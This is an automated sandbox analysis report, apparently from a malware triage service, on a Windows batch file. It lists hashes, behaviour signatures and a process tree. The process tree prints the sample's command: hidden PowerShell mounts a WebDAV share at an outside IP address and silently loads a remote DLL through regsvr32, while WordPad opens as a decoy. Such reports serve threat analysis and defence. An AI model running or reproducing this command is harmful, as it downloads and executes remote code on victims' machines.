Analysis
-
max time kernel
101s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
20-07-2024 10:26
Static task
static1
Behavioral task
behavioral1
Sample
9845109302455514302.bat
Resource
win7-20240704-en
windows7-x64
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
9845109302455514302.bat
Resource
win10v2004-20240709-en
windows10-2004-x64
8 signatures
150 seconds
General
-
Target
9845109302455514302.bat
-
Size
14KB
-
MD5
2e06492f783c5a5235548a19e403a7db
-
SHA1
b83c42f9652afaa2e0febb0d60ca83dedaa5b854
-
SHA256
9b13ab8217a4a958884598c9c244aec78535dcd524d692e8350c208de408e0fd
-
SHA512
e5d3553d90a9200f20e89083de95517ee10390dce7be666c4d74714f031dcb51462c1a2fbd6d150d034d911c7f0afdea2c2d09093c19cadb37fde89d9ad223e7
-
SSDEEP
384:1DGF9yFaXQsS+uwz74YbRn+AFAW/SDw5brzeB6GQ:1QKS6+ueFbR3Aiiw5bmoGQ
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3056 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3056 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2844 wordpad.exe 2844 wordpad.exe 2844 wordpad.exe 2844 wordpad.exe 2844 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2844 1732 cmd.exe 30 PID 1732 wrote to memory of 2844 1732 cmd.exe 30 PID 1732 wrote to memory of 2844 1732 cmd.exe 30 PID 1732 wrote to memory of 3056 1732 cmd.exe 31 PID 1732 wrote to memory of 3056 1732 cmd.exe 31 PID 1732 wrote to memory of 3056 1732 cmd.exe 31 PID 3056 wrote to memory of 2104 3056 powershell.exe 33 PID 3056 wrote to memory of 2104 3056 powershell.exe 33 PID 3056 wrote to memory of 2104 3056 powershell.exe 33 PID 3056 wrote to memory of 2796 3056 powershell.exe 34 PID 3056 wrote to memory of 2796 3056 powershell.exe 34 PID 3056 wrote to memory of 2796 3056 powershell.exe 34 PID 3056 wrote to memory of 2796 3056 powershell.exe 34 PID 3056 wrote to memory of 2796 3056 powershell.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\9845109302455514302.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\1207943111197.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2104
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\1207943111197.dll3⤵PID:2796
-
-